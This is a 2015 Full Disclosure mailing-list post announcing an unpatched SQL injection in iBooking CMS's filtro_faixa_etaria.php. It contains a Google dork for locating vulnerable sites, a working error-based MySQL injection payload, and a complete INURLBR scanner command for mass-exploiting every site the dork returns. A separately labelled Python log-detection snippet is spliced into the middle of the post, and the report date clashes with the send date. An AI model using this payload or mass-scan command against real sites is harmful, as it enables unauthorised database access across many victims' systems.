Date: Wed, 16 Sep 2015 01:53:08 -0300
From: INURL Brasil <inurlbr@...il.com>
To: Packet Storm <packet@...ketstormsecurity.com>,
 Exploit Arab <exploit4arab@...il.com>, 
 submissions@...ketstormsecurity.com, fulldisclosure@...lists.org
Subject: [FD] (0day) IBOOKING CMS - SQL INJECTION

*# VENDOR:*              www.ibooking.com.br
*# Vulnerable versions:* ALL
*# File:*                filtro_faixa_etaria.php
*# Parameter:*           idPousada (GET)
*# DORK:*                intext:"Desenvolvido por ibooking"
*# Reported:*            15/10/2015
#
---------------------------------------------------------------------------------
#  AUTHOR:       Cleiton Pinheiro / Nick: googleINURL
#  EMAIL:        inurlbr@...il.com
#  Blog:         http://blog.inurl.com.br
#  Twitter:      https://twitter.com/googleinurl
#  Fanpage:      https://fb.com/InurlBrasil
#  Pastebin:     http://pastebin.com/u/Googleinurl
#  GIT:          https://github.com/googleinurl
#  PSS:          http://packetstormsecurity.com/user/googleinurl
#  EXA:          http://exploit4arab.net/author/248/Cleiton_Pinheiro
#  YOUTUBE:      http://youtube.com/c/INURLBrasil
#  PLUS:         http://google.com/+INURLBrasil
#
---------------------------------------------------------------------------------

*# Description*
The vulnerable request is issued by a JavaScript function found within the
/motor-de-reservas page; the idPousada value it sends is used by the server-side
query without validation.


# JavaScript code responsible for the vulnerable request

  // jQuery call made from /motor-de-reservas; idPousada is sent as a plain
  // GET parameter and is the value the advisory reports as injectable
  $.ajax({
    type: "GET",
    url: "filtro_faixa_etaria.php",
    data: "qtde_quartos=1&idPousada=61",
    success: function(xml){
      // the returned fragment is written straight into the page
      $("#filtro_faixa_etaria").html(xml);
    }
  });


*# Vulnerable URL:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61

*# POC:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)

*# Example:*
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)

*# Screenshot of the result:*
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png


*# Mass exploitation using the INURLBR scanner*
# Download: https://github.com/googleinurl/SCANNER-INURLBR

*# COMMAND*
*# SETTING THE SEARCH DORK:*
--dork 'YOUR_DORK'
*# USE* --dork 'intext:"Desenvolvido por ibooking"'

*# SETTING OUTPUT FILE:*
*# USE*  -s 'ibooking.txt'

*# SETTING STRING EXPLOIT GET:*
--exploit-get 'EXPLOIT_GET'
*# USE* --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'

*# SETTING TYPE OF VALIDATION:*
*# USE* -t 3
The third type combines the first and second types and, in addition,
connects to the target with the exploit string via the GET method.
The string set in the --exploit-get parameter is appended directly to
the URL:
Example: --exploit-get '/index.php?id=1&file=conect.php'
Injected URL: http://www.target.br/index.php?id=1&file=conect.php

*# SETTING STRING OF VALIDATION:*
Specify the string used to validate the target:
Example:   -a {string}
Using:     -a '<title>hello world</title>'
If the given value is found in the target's response, the target is considered vulnerable.
- USE:     -a 'INURLBR_VULN'
The INURLBR_VULN value is passed in hexadecimal form inside the exploit-get
string (the literal 0x203a3a494e55524c42525f56554c4e3a3a20 decodes to " ::INURLBR_VULN:: ").

*# COMMAND FULL:*
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s
'ibooking.txt' --exploit-get
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'
-t 3 -a 'INURLBR_VULN'
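
Added defensive example, not part of the advisory or of the INURLBR scanner: a small Python checker that applies the integer validation filtro_faixa_etaria.php should enforce on idPousada, decodes MySQL hex literals so the INURLBR_VULN marker described under the -a option above becomes visible, and flags such requests in access-log lines. The log lines, client IPs and function names are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Markers of the error-based MySQL technique in the advisory's PoC
# (double query with FLOOR(RAND(0)*2) ... GROUP BY, INFORMATION_SCHEMA reads).
INJECTION_MARKERS = {
    "information_schema": re.compile(r"information_schema", re.I),
    "floor(rand(": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "@@global": re.compile(r"@@global\.", re.I),
    "select..from": re.compile(r"\bselect\b.*\bfrom\b", re.I | re.S),
}
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
REQUEST_RE = re.compile(r'^(\S+) .*?"GET (\S+) HTTP/')
# Constructed Apache-style access log lines (not taken from the advisory).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Sep/2015:01:53:08 -0300] "GET /motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61 HTTP/1.1" 200 812',
    '198.51.100.9 - - [16/Sep/2015:01:54:11 -0300] "GET /motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+@@GLOBAL.VERSION),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) HTTP/1.1" 500 1203',
]

def decode_hex_literals(value):
    """Expand MySQL 0x.. literals so the hex-encoded ' ::INURLBR_VULN:: ' marker is visible."""
    def repl(m):
        try:
            return bytes.fromhex(m.group(1)).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)  # odd length or non-ASCII: leave the literal alone
    return HEX_LITERAL.sub(repl, value)

def is_safe_id(value):
    """Server-side check the endpoint should enforce: a plain positive integer only."""
    return value.isdigit() and 0 < int(value) < 10**9

def inspect_request(url):
    """Classify one request URL as 'ignore', 'ok', 'sqli' or 'malformed'."""
    parts = urlsplit(url)
    if not parts.path.endswith("filtro_faixa_etaria.php"):
        return "ignore", []
    raw = parse_qs(parts.query, keep_blank_values=True).get("idPousada", [""])[0]
    if is_safe_id(raw):
        return "ok", []
    decoded = decode_hex_literals(raw)  # parse_qs already decoded %xx and '+'
    hits = [name for name, pat in INJECTION_MARKERS.items() if pat.search(decoded)]
    if "INURLBR_VULN" in decoded:
        hits.append("INURLBR_VULN scanner marker")
    return ("sqli" if hits else "malformed"), hits

def scan_log(lines):
    """Return (client_ip, verdict, hits) for each request that fails validation."""
    found = [(m.group(1), *inspect_request(m.group(2))) for m in map(REQUEST_RE.match, lines) if m]
    return [f for f in found if f[1] in ("sqli", "malformed")]
```

Requests whose idPousada is a bare integer pass; anything else is reported, with the marker list showing which parts of the advisory's technique were seen.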

*# MORE INFORMATION:*
http://blog.inurl.com.br/2015/09/0day-ibooking-cms-injecao-de-sql-e.html



+--------------------------------------------------------------------------------------+
  |  |  |                            G R 3 3 T S
     |  |  |

+--------------------------------------------------------------------------------------+
 * r00t-3xp10t, Jh00n, chk_,  Unknownantisec,  sl4y3r 0wn3r, hc0d3r,
arplhmd, 0x4h4x
 * Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra,
Eclipse, shaxer
 * dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão,
IceKiller, c00z
 * Oystex, rH, Warflop, se4b3ar , Pablo Verlly Moreira

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
